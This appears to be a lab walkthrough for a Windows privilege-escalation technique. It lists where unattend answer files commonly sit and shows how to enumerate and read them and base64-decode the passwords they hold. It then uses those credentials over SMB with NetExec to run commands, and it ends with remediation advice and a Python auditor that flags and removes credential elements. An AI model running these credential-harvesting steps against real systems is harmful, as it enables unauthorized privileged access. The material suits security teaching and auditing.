Unattend files, also commonly referred to as "answer files" in the context of Windows installations, are XML-based configuration files that automate Windows Setup. They hold an extensive range of settings and configurations, which is what makes unattended or automated installations possible.
An adversary who can read an answer file may recover the encoded passwords it contains and use them to gain unauthorized access to privileged accounts or sensitive resources.
The following locations commonly contain answer files that may include local administrator credentials:
C:\Windows\Panther\unattend.xml
C:\Windows\Panther\Unattend\unattend.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\sysprep.xml
C:\Windows\System32\Sysprep\Panther\unattend.xml
C:\Windows\sysprep.inf
C:\Windows\unattend.xml
C:\unattend.xml
C:\sysprep.inf
- Open a PowerShell with local Administrator privileges and run the following command to create a new folder:
mkdir "C:\Windows\Panther\Unattend\"
- Download the file unattend.xml to the 'C:\Windows\Panther\Unattend' directory.
To set up the lab with the 'Answer files (Unattend files)' scenario use the custom PowerShell script named AnswerFiles.ps1.
Open a PowerShell with local Administrator privileges and run the script:
.\AnswerFiles.ps1
To perform manual enumeration and identify if there are any answer files that may contain useful credentials, you can use the following PowerShell command:
Write-Host `n;foreach ($file in @('C:\Windows\Panther\unattend.xml', 'C:\Windows\Panther\Unattend\unattend.xml', 'C:\Windows\System32\Sysprep\unattend.xml', 'C:\Windows\System32\Sysprep\sysprep.xml', 'C:\Windows\System32\Sysprep\Panther\unattend.xml', 'C:\Windows\sysprep.inf', 'C:\Windows\unattend.xml', 'C:\unattend.xml', 'C:\sysprep.inf')) { if (Test-Path $file) { Write-Host "[+] $file" } }; Write-Host `n
To run the SharpUp tool and perform an enumeration of the answer files (Unattend files), you can execute the following command with the appropriate arguments:
SharpUp.exe audit UnattendedInstallFiles
- Read the content of the found answer file:
type C:\Windows\Panther\Unattend\Unattend.xml
- To decode the base64 password field, use the following command from your Linux attacking machine:
echo "<base64 string>" | base64 -d
- Once the credentials have been obtained, several services accept them for authentication; if the credentials are still valid, they can be used to elevate privileges.
The most common services are:
- Remote Desktop Protocol (RDP)
- Windows Remote Management (WinRM) (If it is enabled)
- Server Message Block (SMB)
- Windows Management Instrumentation (WMI)
- Virtual Network Computing (VNC) (If it is enabled)
To identify a valid authentication method, you can use NetExec.
This is an example of using the SMB service to authenticate against the workstation and execute a command:
nxc smb <ip> -u <username> -p '<password>' -x whoami
Ensure that the password fields in answer files use a strong encryption format, or remove them altogether when the files no longer need them.
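The enumeration one-liner above only reports whether an answer file exists; an auditor also wants to know whether the file still carries credentials and, if it must stay on disk, how to strip them. The following is an added example (not part of the original lab or of SharpUp/NetExec) that parses an answer file, reports every credential element with its PlainText flag and whether the value merely looks base64-encoded (answer files encode, they never encrypt), and returns a copy with those elements removed. The sample answer file and its dummy values are constructed here; treating an absent PlainText flag as unknown rather than assuming a default is an assumption of this script.

```python
import re
import xml.etree.ElementTree as ET

NS = "urn:schemas-microsoft-com:unattend"
# Credential-bearing elements in AutoLogon, UserAccounts/LocalAccounts and unattended-join Credentials
PASSWORD_ELEMENTS = {"Password", "AdministratorPassword"}
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def _local(tag):
    """Strip the namespace prefix from a tag name."""
    return tag.rsplit("}", 1)[-1]

def audit_unattend(xml_text):
    """Report each credential element: location, PlainText flag, base64-looking value; never decodes."""
    findings = []
    for settings in ET.fromstring(xml_text).iter(f"{{{NS}}}settings"):
        for comp in settings.iter(f"{{{NS}}}component"):
            for elem in comp.iter():
                if _local(elem.tag) not in PASSWORD_ELEMENTS:
                    continue
                value_el = elem.find(f"{{{NS}}}Value")
                if value_el is None:  # unattended-join Credentials/Password holds bare text
                    value, plaintext = (elem.text or "").strip(), True
                else:
                    value = (value_el.text or "").strip()
                    flag = elem.findtext(f"{{{NS}}}PlainText")  # None when absent (assumption: unknown)
                    plaintext = None if flag is None else flag.strip().lower() == "true"
                findings.append({"pass": settings.get("pass"), "component": comp.get("name"),
                                 "element": _local(elem.tag), "has_value": bool(value),
                                 "plaintext": plaintext,
                                 "base64_like": plaintext is not True and bool(B64_RE.match(value))})
    return findings

def strip_credentials(xml_text):
    """Return the answer file with every credential element removed (for files that must stay on disk)."""
    ET.register_namespace("", NS)
    root = ET.fromstring(xml_text)
    for parent in list(root.iter()):
        for child in list(parent):
            if _local(child.tag) in PASSWORD_ELEMENTS:
                parent.remove(child)
    return ET.tostring(root, encoding="unicode")

# Constructed sample: a base64-encoded AutoLogon password and a plaintext local-admin password (dummies)
SAMPLE = """<unattend xmlns="urn:schemas-microsoft-com:unattend"><settings pass="oobeSystem">
<component name="Microsoft-Windows-Shell-Setup"><AutoLogon><Enabled>true</Enabled>
<Username>Administrator</Username><Password><Value>UABhAHMAcwB3AG8AcgBkAA==</Value>
<PlainText>false</PlainText></Password></AutoLogon><UserAccounts><AdministratorPassword>
<Value>Passw0rd!</Value><PlainText>true</PlainText></AdministratorPassword></UserAccounts>
</component></settings></unattend>"""
```

Run `audit_unattend` over each path from the list above that exists on the host; an empty result means the file can stay, anything else means it should be deleted or passed through `strip_credentials`.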